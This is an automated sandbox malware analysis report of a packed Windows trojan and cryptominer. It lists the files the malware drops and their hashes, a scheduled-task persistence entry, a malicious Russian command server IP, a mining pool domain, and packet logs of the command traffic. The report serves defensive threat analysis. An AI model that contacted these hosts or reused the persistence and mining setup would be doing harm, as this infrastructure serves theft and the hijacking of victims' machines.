http://tempuri.org/Entity/Id24Response | AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735232254.000000000713C000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://tempuri.org/Entity/Id1Response | AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested | AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp | false | - | high
http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly | AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp | false | - | high
http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay | AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp | false | - | high
http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego | AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp | false | - | high
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary | AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp | false | - | high
http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC | AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp | false | - | high
http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey | AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp | false | - | high
http://schemas.xmlsoap.org/ws/2004/08/addressing | AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp | false | - | high
https://support.google.com/chrome/?p=plugin_shockwave | AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.736578138.00000000074A1000.00000004.00000001.sdmp | false | - | high
http://forms.rea | AppLaunch.exe, 00000001.00000002.736195210.00000000073DD000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmp | false | - | 
                                                                                                          • URL Reputation: safe
                                                                                                          unknown
                                                                                                          http://schemas.xmlsoap.org/ws/2005/02/trust/RST/IssueAppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpfalse
                                                                                                            high
                                                                                                            http://schemas.xmlsoap.org/ws/2004/10/wsat/CompletionAppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpfalse
                                                                                                              high
                                                                                                              http://schemas.xmlsoap.org/ws/2004/04/trustAppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpfalse
                                                                                                                high
                                                                                                                http://tempuri.org/Entity/Id10AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                unknown
                                                                                                                https://xmrig.com/benchmark/%sconhost.exe, 00000011.00000003.768854155.00000201F4E40000.00000004.00000001.sdmp, conhost.exe, 00000011.00000002.833907322.000002019125C000.00000004.00000001.sdmp, conhost.exe, 00000011.00000002.822124457.0000020190009000.00000004.00000001.sdmp, conhost.exe, 00000011.00000002.829515499.0000020190C84000.00000004.00000001.sdmp, conhost.exe, 00000015.00000002.818855585.00000224E8755000.00000004.00000001.sdmp, conhost.exe, 00000015.00000002.821696567.00000224E8D2D000.00000004.00000001.sdmp, conhost.exe, 00000015.00000002.812013124.00000224E7AD9000.00000004.00000001.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                unknown
                                                                                                                http://tempuri.org/Entity/Id11AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                unknown
                                                                                                                http://tempuri.org/Entity/Id12AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                unknown
                                                                                                                http://tempuri.org/Entity/Id16ResponseAppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                unknown
                                                                                                                http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponseAppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpfalse
                                                                                                                  high
                                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/CancelAppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpfalse
                                                                                                                    high
                                                                                                                    http://tempuri.org/Entity/Id13AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    unknown
                                                                                                                    http://tempuri.org/Entity/Id14AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    unknown
                                                                                                                    http://tempuri.org/Entity/Id15AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    unknown
                                                                                                                    http://tempuri.org/Entity/Id16AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    unknown
                                                                                                                    http://schemas.xmlsoap.org/ws/2005/02/trust/NonceAppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpfalse
                                                                                                                      high
                                                                                                                      http://tempuri.org/Entity/Id17AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      unknown
                                                                                                                      http://tempuri.org/Entity/Id18AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      unknown
                                                                                                                      http://tempuri.org/Entity/Id5ResponseAppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      unknown
                                                                                                                      http://tempuri.org/Entity/Id19AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      unknown
                                                                                                                      http://schemas.xmlsoap.org/ws/2004/08/addressing/faultDAppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpfalse
                                                                                                                        high
                                                                                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dnsAppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpfalse
                                                                                                                          high
                                                                                                                          http://go.mic4mconhost.exe, 00000015.00000000.751481626.00000224D5CB2000.00000004.00000020.sdmp, conhost.exe, 00000015.00000002.809219081.00000224D5CAB000.00000004.00000020.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          unknown
                                                                                                                          http://tempuri.org/Entity/Id10ResponseAppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735568362.0000000007222000.00000004.00000001.sdmpfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          unknown
                                                                                                                          http://schemas.xmlsoap.org/ws/2005/02/trust/RenewAppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpfalse
                                                                                                                            high
                                                                                                                            http://tempuri.org/Entity/Id8ResponseAppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            unknown
                                                                                                                            https://support.google.com/chrome/?p=plugin_wmpAppLaunch.exe, 00000001.00000002.736195210.00000000073DD000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmpfalse
                                                                                                                              high
                                                                                                                              http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKeyAppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpfalse
                                                                                                                                high
                                                                                                                                http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpfalse
                                                                                                                                  high

Contacted IPs

Public

IP              Domain           Country             ASN     ASN Name                                            Malicious
45.82.70.152    unknown          Netherlands         204601  ON-LINE-DATA Serverlocation-Netherlands Dronten NL  false
157.90.156.89   mine.bmpool.org  United States       766     REDIRIS RedIRIS Autonomous System ES                false
95.143.179.185  unknown          Russian Federation  25560   RHTEC-AS rh-tec IP Backbone DE                      true

General Information

Joe Sandbox Version: 34.0.0 Boulder Opal
Analysis ID: 553228
Start date: 14.01.2022
Start time: 14:09:20
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 13m 39s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed: 37
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.spyw.evad.mine.winEXE@39/7@2/3
EGA Information:
• Successful, ratio: 54.5%
HDC Information:
• Successful, ratio: 67.9% (good quality ratio 55.5%)
• Quality average: 46%
• Quality standard deviation: 32%
HCA Information: Failed
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
• Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
• TCP Packets have been reduced to 100
• Excluded IPs from analysis (whitelisted): 23.211.6.115
• Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, store-images.s-microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
• Execution Graph export aborted for target 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe, PID 6220 because there are no executed function
• Execution Graph export aborted for target AppLaunch.exe, PID 5180 because it is empty
• Execution Graph export aborted for target explorer.exe, PID 4876 because there are no executed function
• Execution Graph export aborted for target explorer.exe, PID 6924 because there are no executed function
• Execution Graph export aborted for target sistem.exe, PID 5576 because there are no executed function
• Not all processes where analyzed, report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing network information.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                                  Simulations

                                                                                                                                  Behavior and APIs

                                                                                                                                  TimeTypeDescription
                                                                                                                                  14:10:36API Interceptor76x Sleep call for process: AppLaunch.exe modified
                                                                                                                                  14:10:47API Interceptor1x Sleep call for process: Microsoft.exe modified
                                                                                                                                  14:10:51API Interceptor1x Sleep call for process: conhost.exe modified
                                                                                                                                  14:10:53Task SchedulerRun new task: services64 path: C:\Users\user\AppData\Local\Temp\services64.exe
                                                                                                                                  14:10:54API Interceptor2x Sleep call for process: services64.exe modified
                                                                                                                                  14:10:58API Interceptor1x Sleep call for process: sihost64.exe modified

                                                                                                                                  Joe Sandbox View / Context

                                                                                                                                  IPs

                                                                                                                                  No context

                                                                                                                                  Domains

                                                                                                                                  No context

                                                                                                                                  ASN

                                                                                                                                  No context

                                                                                                                                  JA3 Fingerprints

                                                                                                                                  No context

                                                                                                                                  Dropped Files

                                                                                                                                  No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log
Process: C:\Windows\System32\conhost.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 539
Entropy (8bit): 5.348465763088588
Encrypted: false
SSDEEP: 12:Q3La/KDLI4MWuPTxAIWzAbDLI4MNCIBTaDAWDLI4MWuCv:ML9E4Kr8sXE4+aE4Ks
MD5: AD3DC4BDB13FFE4ABD214A6EB4E5A519
SHA1: A2C3FCBCA3F40AE579E303AA8E8E2810860F088C
SHA-256: EEA4FDD5FA39D6145F4C5ABFB3BEB63C1D750B2BBA95D5D9D52F245AA07DC02D
SHA-512: 50E0046F80823EB299545C16DD4A027A6294CC74294AE12D9A40F62FB6F1E92319511E90486427F2FEE44E6BB3E1317EA582284FB6CD82CA1BE9B5F3614BBE12
Malicious: false
Reputation: unknown
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Management\d0f4eb5b1d0857aabc3e7dd079735875\System.Management.ni.dll",0..2,"System.IO.Compression, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\AppLaunch.exe.log
Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 2291
Entropy (8bit): 5.3192079301865585
Encrypted: false
SSDEEP: 48:MOfHK5HKXAHKhBHKdHKB1AHKzvQTHmYHKhQnoPtHoxHImHK1HjHKoLHG1qHqH5HX:vq5qXAqLqdqUqzcGYqhQnoPtIxHbq1Ds
MD5: A7DF088AA34326DF55EBEABB6C9550BE
SHA1: 452C8EF09C52F0DF853D97EFFF159AA56625EAEA
SHA-256: 4E15698573516EBEBA9F6BE8094135F3CA810D48FDCDC7E827463EDB2AFCECE4
SHA-512: 8263C8D9F26878E088AACBFCCB6C545AEB5B11DF3422DD276AC1A96AA3E66CE9F54802E4EE3DE5B1C1E680364901F99FCB1169BA23E3878B7B5114B2BC0BE871
Malicious: false
Reputation: unknown
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.ServiceModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"SMDiagnostics, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.IdentityModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12#\34957343ad5d84daee97a1affda91665\System.Runtime.Serialization.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..2,"System.ServiceModel.Internals, Version=4.0.0.0, Culture=
C:\Users\user\AppData\Local\Temp\Microsoft.exe
Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
File Type: PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category: dropped
Size (bytes): 2233856
Entropy (8bit): 7.999686027647644
Encrypted: true
SSDEEP: 49152:4zEksk2+pV73APQ1HwNPT+p0+L+wupSPtabrvoOmRQj3duUbgQs0r:4zXU+r3v9w5T+p0+L/upCSrfxuUkQ1
MD5: AFA47609E27DB892A6E3597A88C5645A
SHA1: EBF7F62E5689F11BFA334A8E40804CA8B32C8339
SHA-256: 529043B5FCEF43623835319764499B2A4DDBAE2477697F22AADA0E09352B83C5
SHA-512: B3E906A04B22701F0C4938433B5DB7ABA1DBD894E9D7FBC9DD1CC4FE685351CF9D06A05B6504A4E79A7193C69B1C619D6EEF20C0816C79875A54827E12BF5E28
Malicious: true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Virustotal, Detection: 53%
Reputation: unknown
C:\Users\user\AppData\Local\Temp\services64.exe
Process: C:\Windows\System32\conhost.exe
File Type: PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category: dropped
Size (bytes): 2233856
Entropy (8bit): 7.999686027647644
Encrypted: true
SSDEEP: 49152:4zEksk2+pV73APQ1HwNPT+p0+L+wupSPtabrvoOmRQj3duUbgQs0r:4zXU+r3v9w5T+p0+L/upCSrfxuUkQ1
MD5: AFA47609E27DB892A6E3597A88C5645A
SHA1: EBF7F62E5689F11BFA334A8E40804CA8B32C8339
SHA-256: 529043B5FCEF43623835319764499B2A4DDBAE2477697F22AADA0E09352B83C5
SHA-512: B3E906A04B22701F0C4938433B5DB7ABA1DBD894E9D7FBC9DD1CC4FE685351CF9D06A05B6504A4E79A7193C69B1C619D6EEF20C0816C79875A54827E12BF5E28
Malicious: true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Virustotal, Detection: 53%
Reputation: unknown
C:\Users\user\AppData\Local\Temp\sistem.exe
Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 3514792
Entropy (8bit): 7.99852479553142
Encrypted: true
SSDEEP: 98304:sMcpY7WYnC7PyUMxgD9WbqlhsHh4TD5nzQX+:sfmWYniqUMxgD3l6CTDg+
MD5: 14A6FC2FF495BE7077B8AA7602606BB7
SHA1: 0B985B103E0AE6C21B9AC1DB8DFFFB3A68744348
SHA-256: F7E9394DEB6140CCB3DF12A53E94E8B2D28DA6F7C9D0143736E3067E5AA88765
SHA-512: AF599C8CF10341E71DDA685B2C0FFC268AD3F37854EF20B69E04B4661720AC55580EF6059CAF7A14CC0DEEB2405E1DBEDA67A241B59AF23E402E690C3AAECF6E
Malicious: true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: Metadefender, Detection: 31%
• Antivirus: ReversingLabs, Detection: 75%
Reputation: unknown
C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys
Process: C:\Windows\System32\conhost.exe
File Type: PE32+ executable (native) x86-64, for MS Windows
Category: dropped
Size (bytes): 14544
Entropy (8bit): 6.2660301556221185
Encrypted: false
SSDEEP: 192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
MD5: 0C0195C48B6B8582FA6F6373032118DA
SHA1: D25340AE8E92A6D29F599FEF426A2BC1B5217299
SHA-256: 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
SHA-512: AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
Malicious: true
Antivirus:
• Antivirus: Metadefender, Detection: 3%
• Antivirus: ReversingLabs, Detection: 5%
Reputation: unknown
C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe
Process: C:\Windows\System32\conhost.exe
File Type: PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category: dropped
Size (bytes): 31232
Entropy (8bit): 7.579054897335154
Encrypted: false
SSDEEP: 768:bhq1ifn21Lqk0qRqHobJcA7R1TSR3N6h0m4:F7f21LqrqJJF7R1TSBNQ4
MD5: A5D983222C60F4DCAE743F8E34806580
SHA1: F55DC0A74F3CB665F4CB359D2A953244035B389F
SHA-256: E6463D8B80C83D55FE18A9C308B1DBBEBDAD5E40CC52C9F91CF9A3C1D4CDDE84
SHA-512: 542E702017F4A23879090F1CCB8215CBE43DF1B765BEC7C19BC803AC4BD6D947CC96833B4095B9CC7ED5029BE8DBAED9A40D0D6CB83D638F59B80893CBFA4946
Malicious: true
Antivirus:
• Antivirus: Avira, Detection: 100%
Reputation: unknown

Static File Info

General

File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.9976199230870035
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe
File size: 3609088
MD5: c7f9efb09db59923b3f96fd1ef2f0873
SHA1: 43ee2579fef8ff0c3a5d53f3dc4306bbdf04d484
SHA256: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001dd491ac614fdef1fa149
SHA512: fd926bc25e61bfee4cb873b15f78556e4f23ddb853babbdd2985dd36386da9185433c4b6624b4dd444ae5121073c4d6861d4161ba9c460be62d2f49f2b999389
SSDEEP: 98304:4DIDD0PzdRnlgUpPGRShIyR5elYuHkpluPsLaDKUOVV:4De0PXnlbCyalu3uPsWDKUOVV

File Icon

Icon Hash: 00828e8e8686b000

Static PE Info

General

Entrypoint: 0x401000
Entrypoint Section:
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
DLL Characteristics: TERMINAL_SERVER_AWARE, NX_COMPAT
Time Stamp: 0x61E08BFA [Thu Jan 13 20:30:50 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 6
OS Version Minor: 0
File Version Major: 6
File Version Minor: 0
Subsystem Version Major: 6
Subsystem Version Minor: 0
Import Hash: c284fa365c4442728ac859c0f9ed4dc5

Entrypoint Preview

Instruction
push 008F5001h
call 00007F9C80C70E16h
ret
ret
int3
jnbe 00007F9C80C70DC7h
inc edx
and al, A4h
pushfd
jo 00007F9C80C70E67h
leave
hlt
je 00007F9C80C70DF8h
push es
jmp 00007F9CBC84149Eh
shl dword ptr [eax-7Ch], cl
inc esi
jnbe 00007F9C80C70DFBh
out dx, al
xor esp, dword ptr [edx-2497F614h]
salc
in al, dx
push esp
arpl word ptr [esi], ax
pop ebp
push ss
xchg eax, ecx
cmp al, byte ptr [esp]
fisubr dword ptr [ebx-6276E776h]
add al, byte ptr [edi-03h]
pop edx
jnc 00007F9C80C70E76h
aad 80h
call 00007F9C30D4F91Dh
sbb eax, AAC528A4h
push esp
inc edi
dec ecx
push 6B96E3E9h
test al, A0h
mov al, byte ptr [A6A20888h]
mov ebp, CA88F2F5h
mov edi, 409E3134h
jns 00007F9C80C70E1Fh
mov eax, dword ptr [1760B368h]
std
sbb eax, 1B1FFC35h
cmc
xchg dword ptr [eax-4Fh], ebx
dec ebx
jmp far 0A33h : DC128E1Dh
and dword ptr [ebx], edx
push ebx
xchg eax, esp
jp 00007F9C80C70E5Bh
rol byte ptr [ebx+1401D018h], 1
mov esi, 06315812h
movsd
jecxz 00007F9C80C70DC1h
cmp ah, byte ptr [esi-64h]
jp 00007F9C80C70E76h
adc ecx, dword ptr [edi+2D89AC22h]
das
ret
jecxz 00007F9C80C70E84h
scasb
adc ebx, edi
wait
mov ebp, D4296BE2h
adc ecx, dword ptr [F8540E75h]
dec eax
pop ecx
mov al, 0Ah
inc esp
inc ebx
retf
leave
int3
push ss
enter 29E8h, AAh

Data Directories

Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x4f5c7c         0x120         .loHdXUK
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x4db000         0x1961d       .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x0              0x0
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x0              0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x100000

Sections

Name        Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy        Characteristics
(nameless)  0x1000           0x22000       0x11200   False     1.00044194799    data       7.99714150919  IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
(nameless)  0x23000          0x1000        0x800     False     1.00537109375    data       7.89828462596  IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
(nameless)  0x24000          0xf000        0x7a00    False     1.00051229508    data       7.99330469272  IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
(nameless)  0x33000          0x2000        0x400     False     1.0107421875     data       7.78378163159  IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
(nameless)  0x35000          0x184b57      0x0       False     0                empty      0.0            IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
(nameless)  0x1ba000         0x321000      0x2f2e00  unknown   unknown          unknown    unknown        IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc       0x4db000         0x1a000       0x19800   False     0.797200520833   data       7.22431447957  IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.loHdXUK    0x4f5000         0x4b000       0x4b000   False     0.987828776042   data       7.91937517669  IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.adata      0x540000         0x1000        0x0       False     0                empty      0.0            IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ

Resources

Name         RVA       Size     Type                   Language  Country
RT_RCDATA    0x4db0a0  0x19400  data                   Russian   Russia
RT_MANIFEST  0x4f44a0  0x17d    XML 1.0 document text  English   United States

Imports

DLL           Import
kernel32.dll  GetProcAddress, GetModuleHandleA, LoadLibraryA
user32.dll    SendNotifyMessageA
user32.dll    GetProcessWindowStation
oleaut32.dll  VariantChangeTypeEx
kernel32.dll  RaiseException

Possible Origin

Language of compilation system  Country where language is spoken
Russian                         Russia
English                         United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp                            Source Port  Dest Port  Source IP       Dest IP
Jan 14, 2022 14:10:23.709512949 CET  49775        31334      192.168.2.4     95.143.179.185
Jan 14, 2022 14:10:23.796896935 CET  31334        49775      95.143.179.185  192.168.2.4
Jan 14, 2022 14:10:23.797002077 CET  49775        31334      192.168.2.4     95.143.179.185
Jan 14, 2022 14:10:24.136492968 CET  49775        31334      192.168.2.4     95.143.179.185
Jan 14, 2022 14:10:24.224102020 CET  31334        49775      95.143.179.185  192.168.2.4
Jan 14, 2022 14:10:24.264045954 CET  49775        31334      192.168.2.4     95.143.179.185
Jan 14, 2022 14:10:25.159163952 CET  49775        31334      192.168.2.4     95.143.179.185
Jan 14, 2022 14:10:25.247483015 CET  31334        49775      95.143.179.185  192.168.2.4
Jan 14, 2022 14:10:25.295356035 CET  49775        31334      192.168.2.4     95.143.179.185
Jan 14, 2022 14:10:32.091963053 CET  49775        31334      192.168.2.4     95.143.179.185
Jan 14, 2022 14:10:32.186028957 CET  31334        49775      95.143.179.185  192.168.2.4
